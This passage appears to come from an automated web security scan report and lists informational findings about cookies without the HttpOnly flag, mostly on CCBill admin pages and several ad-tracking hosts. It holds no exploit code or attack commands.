11.51. https://admin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.52. https://admin.ccbill.com/adminBanners/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/adminBanners/blank.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.53. https://admin.ccbill.com/ccbillLogin.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ccbillLogin.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.54. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/adapter/ext/ext-base.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.55. https://admin.ccbill.com/ext-2.2/custom/combos.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/combos.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.56. https://admin.ccbill.com/ext-2.2/custom/login.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/login.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.57. https://admin.ccbill.com/ext-2.2/custom/password.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/custom/password.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.58. https://admin.ccbill.com/ext-2.2/ext-all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/ext-all.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.59. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/css/ext-all.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.60. https://admin.ccbill.com/ext-2.2/resources/images/default/button/btn-sprite.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/button/btn-sprite.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.61. https://admin.ccbill.com/ext-2.2/resources/images/default/form/text-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/form/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.62. https://admin.ccbill.com/ext-2.2/resources/images/default/form/trigger.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/form/trigger.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.63. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-c.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/shadow-c.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.64. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-lr.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/shadow-lr.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.65. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/ext-2.2/resources/images/default/shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.66. https://admin.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.67. https://admin.ccbill.com/images/ccb_AffiliateSystemBanner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_AffiliateSystemBanner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.68. https://admin.ccbill.com/images/ccb_AffiliateSystemBkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_AffiliateSystemBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.69. https://admin.ccbill.com/images/ccb_ClientSupportAreaBkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_ClientSupportAreaBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.70. https://admin.ccbill.com/images/ccb_LearnMoreBtn.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LearnMoreBtn.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.71. https://admin.ccbill.com/images/ccb_LoginBoxBottom.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxBottom.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.72. https://admin.ccbill.com/images/ccb_LoginBoxDiv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxDiv.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.73. https://admin.ccbill.com/images/ccb_LoginBoxLeft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxLeft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.74. https://admin.ccbill.com/images/ccb_LoginBoxRight.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxRight.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.75. https://admin.ccbill.com/images/ccb_LoginBoxTop.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxTop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.76. https://admin.ccbill.com/images/ccb_OnlineSupportBox1Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_OnlineSupportBox1Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.77. https://admin.ccbill.com/images/ccb_OnlineSupportBox2Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_OnlineSupportBox2Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.78. https://admin.ccbill.com/images/ccb_OnlineSupportBox3Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_OnlineSupportBox3Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.79. https://admin.ccbill.com/images/ccb_SupportBarBottom.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarBottom.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.80. https://admin.ccbill.com/images/ccb_SupportBarDiv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarDiv.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.81. https://admin.ccbill.com/images/ccb_SupportBarLeft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarLeft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.82. https://admin.ccbill.com/images/ccb_SupportBarRight.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarRight.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.83. https://admin.ccbill.com/images/ccb_System5Banner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_System5Banner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.84. https://admin.ccbill.com/images/ccb_System5Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_System5Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.85. https://admin.ccbill.com/js/AC_RunActiveContent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/js/AC_RunActiveContent.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.86. https://admin.ccbill.com/js/liveChat.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/js/liveChat.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.87. https://admin.ccbill.com/js/loginJSTools.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/js/loginJSTools.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.88. https://admin.ccbill.com/login.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/login.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.89. https://admin.ccbill.com/loginIndex.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginIndex.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.90. https://admin.ccbill.com/loginMM.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginMM.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.91. https://admin.ccbill.com/style/css/ccbill_style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/ccbill_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.92. https://admin.ccbill.com/style/css/default_style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/default_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.93. https://admin.ccbill.com/style/css/images/text-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/images/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.94. https://admin.ccbill.com/style/css/password.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/css/password.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.95. https://admin.ccbill.com/style/images/bg_img.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.96. https://admin.ccbill.com/style/images/ccbillLogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/ccbillLogo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.97. https://admin.ccbill.com/style/images/contactCCBillBtn.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/contactCCBillBtn.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.98. https://admin.ccbill.com/style/images/email_icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/email_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.99. https://admin.ccbill.com/style/images/exclamation_icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/exclamation_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.100. https://admin.ccbill.com/style/images/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/s.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.101. https://admin.ccbill.com/style/images/section_bg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/section_bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.102. https://admin.ccbill.com/style/images/warning_icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/warning_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.103. https://affiliateadmin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.104. https://affiliateadmin.ccbill.com/ccbill.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/ccbill.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.105. https://affiliateadmin.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.106. http://ak1.abmr.net/is/www.burstnet.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.burstnet.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-FCCFE70FC078DF56F822F11184DD577711D1122C5237AE2450DD7C528764A808-B6B889F3E8363450BBEA94C78C886431A3DEBFBDA1848E28D8622FD8361BC0A3; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.107. http://ak1.abmr.net/is/www.imiclk.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.imiclk.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-ADF10014E4A43A066D5B2D3C72879A1FF451007B3D76D32FDC272F60C7891715-AC66A02713FC636745EAA11C681C5FB4381547F40591FF69D8FEF24E6B871AC5; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.108. http://ak1.abmr.net/is/www.lowes.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.lowes.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-588A1646FB542241472A8B4440942118BA09C37ACD5A2B656F23045D42DB1862-E89A6F43FA6979A9F8EEDA48EC83D287A682F51269B1357F0CA7CF6B32B6B074; expires=Wed, 11-Jul-2012 21:30:48 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.109. http://akamai.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akamai.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1310488542; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.110. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akamai.turn.com
Path:	/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3787648658091279733; Domain=.turn.com; Expires=Sun, 08-Jan-2012 21:32:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.111. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

